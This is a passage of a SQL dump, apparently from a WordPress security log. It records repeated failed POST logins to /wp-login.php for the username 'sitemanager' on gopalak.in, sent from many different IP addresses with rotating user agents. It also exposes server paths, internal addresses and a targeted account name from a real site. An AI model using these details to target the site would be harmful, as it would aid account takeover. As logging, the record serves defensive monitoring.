00:00:00'),(94126,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51666\";s:11:\"REMOTE_ADDR\";s:12:\"195.20.19.31\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745501520.689894;s:12:\"REQUEST_TIME\";i:1745501520;}}','195.20.19.31',0,'2025-04-24 19:02:02','1970-01-01 00:00:00'),(94127,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37762\";s:11:\"REMOTE_ADDR\";s:14:\"164.90.225.186\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745501944.6542349;s:12:\"REQUEST_TIME\";i:1745501944;}}','164.90.225.186',0,'2025-04-24 19:09:06','1970-01-01 00:00:00'),(94128,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55452\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.207.168\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745502359.2675941;s:12:\"REQUEST_TIME\";i:1745502359;}}','199.188.207.168',0,'2025-04-24 19:16:01','1970-01-01 00:00:00'),(94129,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33710\";s:11:\"REMOTE_ADDR\";s:15:\"103.234.209.234\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745502775.011296;s:12:\"REQUEST_TIME\";i:1745502775;}}','103.234.209.234',0,'2025-04-24 19:22:56','1970-01-01 00:00:00'),(94130,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52556\";s:11:\"REMOTE_ADDR\";s:15:\"162.214.124.144\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745503192.2318659;s:12:\"REQUEST_TIME\";i:1745503192;}}','162.214.124.144',0,'2025-04-24 19:29:53','1970-01-01 00:00:00'),(94131,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58292\";s:11:\"REMOTE_ADDR\";s:12:\"81.12.53.206\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745503610.292685;s:12:\"REQUEST_TIME\";i:1745503610;}}','81.12.53.206',0,'2025-04-24 19:36:57','1970-01-01 00:00:00'),(94132,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39166\";s:11:\"REMOTE_ADDR\";s:12:\"31.172.67.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745504027.016161;s:12:\"REQUEST_TIME\";i:1745504027;}}','31.172.67.59',0,'2025-04-24 19:43:48','1970-01-01 00:00:00'),(94133,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35586\";s:11:\"REMOTE_ADDR\";s:13:\"192.34.56.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745504456.855123;s:12:\"REQUEST_TIME\";i:1745504456;}}','192.34.56.148',0,'2025-04-24 19:50:58','1970-01-01 00:00:00'),(94134,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36212\";s:11:\"REMOTE_ADDR\";s:14:\"188.165.54.175\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745504879.462409;s:12:\"REQUEST_TIME\";i:1745504879;}}','188.165.54.175',0,'2025-04-24 19:58:01','1970-01-01 00:00:00'),(94135,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47090\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745505302.1652479;s:12:\"REQUEST_TIME\";i:1745505302;}}','198.54.114.43',0,'2025-04-24 20:05:04','1970-01-01 00:00:00'),(94136,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53770\";s:11:\"REMOTE_ADDR\";s:12:\"103.132.20.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\